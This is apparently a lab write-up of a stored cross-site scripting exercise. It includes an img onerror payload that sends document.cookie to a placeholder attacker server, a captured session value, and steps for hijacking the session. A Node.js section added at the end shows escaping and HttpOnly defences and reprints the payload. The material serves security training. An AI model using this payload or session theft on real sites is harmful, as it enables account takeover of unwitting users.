# 22) Exploiting cross-site scripting to steal cookies

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FENNyx5UavIIclku0aziF%2Fimage.png?alt=media&#x26;token=84f5062b-5e5a-4c11-bad3-6915223710b5" alt=""><figcaption></figcaption></figure></div>

#### Locate possible injection points

As usual, the first step is to analyse the application. There is a comment form, so we fill it with a random string such as **xxxx**, then open the developer tools and find where the user input lands in the HTML.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FVhl8B4sKArNTSmi1Lec2%2Fimage.png?alt=media&#x26;token=9f32ac27-0d99-4f05-bc0b-b2104f80d92e" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FJooe4FRmwIoOANLdTDI4%2Fimage.png?alt=media&#x26;token=2fef1f21-a91f-4c14-a874-e7e8a9bdf134" alt=""><figcaption></figcaption></figure></div>

Let's inject a simple `img` payload into the comment field and try to trigger an alert.

payload => **`<img src=x onerror=alert(1)>`**

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FjYhkCHBqpHvCsRWrsXFc%2Fimage.png?alt=media&#x26;token=9a0918d9-2044-4ea2-a9f8-360fc3951853" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FlfFJlkAKnVwO0Z1vEZk9%2Fimage.png?alt=media&#x26;token=fdd71dd9-6932-41a7-a513-183c412a8d1e" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FeWqZQFXWlZcflHF1orFF%2Fimage.png?alt=media&#x26;token=3dc8550e-2e13-43e2-96ad-c84135bf6e94" alt=""><figcaption></figcaption></figure></div>

Now let's open Burp Suite Collaborator and use it as the destination in the cookie-stealing payload:

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FDLpENoLs3jA7d4M3Qhx8%2Fimage.png?alt=media&#x26;token=3f9d347c-6a4a-4378-8f78-dc7d7d68b3a6" alt=""><figcaption></figcaption></figure></div>

```html
<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
```

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FG5JcrF2IxblxkAt8NghI%2Fimage.png?alt=media&#x26;token=afae38e7-3de2-40de-899e-bf31f6039b77" alt=""><figcaption></figcaption></figure></div>

This payload makes anyone who views the comment issue a GET request to your subdomain on the public Collaborator server, with their cookie in the `c` URL search parameter.

If Collaborator did not poll automatically, click `Poll now`.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2Fnpl0eVNLQIE8myKyy1Jg%2Fimage.png?alt=media&#x26;token=39c74ae8-6fa0-4829-8380-188f654c6db0" alt=""><figcaption></figcaption></figure></div>

So this is the victim's session cookie value:

```
zO3ZD5fvkLh3kA55da9fHJXdGMqXePrg
```

Replace your own session cookie with the stolen value and save the edit. I used the Cookie Editor extension; the browser devtools work just as well.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FB5ZbbadHJ0pZRYer0sS8%2Fimage.png?alt=media&#x26;token=818e78a3-1d4e-4977-ae09-2a9803a3c98b" alt=""><figcaption></figcaption></figure></div>

Now refresh the page with the hijacked session, and the lab is solved.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2Fu7n3QNqbwje3c08gaUFI%2Fimage.png?alt=media&#x26;token=f515f9b5-53d1-433b-adc6-05f333468afc" alt=""><figcaption></figcaption></figure></div>
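As an added example that is not part of the lab or this writeup, here is the server-side counterpart to the chain above, in Node.js: the unescaped comment rendering that lets the stored payload execute, the encoded rendering that turns the same payload into inert text, and a `Set-Cookie` header with `HttpOnly` so the session value is not readable through `document.cookie` at all (the theft above only works because the lab's session cookie lacks that flag). The function names and cookie attributes are assumptions, not the lab's code.

```javascript
// Added example, not from the writeup: the two defensive layers that break
// the stored-XSS cookie theft shown above.

// Encode the five characters that can change HTML text context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable rendering: untrusted comment text concatenated straight into HTML,
// so an <img onerror=...> comment becomes a live element for every viewer.
function renderCommentVulnerable(comment) {
  return `<p class="comment">${comment}</p>`;
}

// Hardened rendering: the same comment, encoded for HTML text content.
// The browser shows the payload as text and never runs the onerror handler.
function renderCommentSafe(comment) {
  return `<p class="comment">${escapeHtml(comment)}</p>`;
}

// Session cookie header with HttpOnly (blocks document.cookie access),
// Secure (never sent over plaintext HTTP) and SameSite=Lax (limits cross-site sends).
function sessionCookieHeader(value) {
  return `session=${value}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Quick check for a Set-Cookie header: does it carry the flags that matter here?
function cookieIsHardened(header) {
  const attrs = header.split(';').slice(1).map((a) => a.trim().toLowerCase());
  return attrs.includes('httponly') && attrs.includes('secure');
}

// Constructed sample input: the exfiltration payload from this writeup, with its
// placeholder host left in place.
const PAYLOAD = '<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>';

console.log(renderCommentVulnerable(PAYLOAD)); // live <img> element
console.log(renderCommentSafe(PAYLOAD));       // &lt;img ... rendered as text
console.log(sessionCookieHeader('constructed-session-value'));
```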

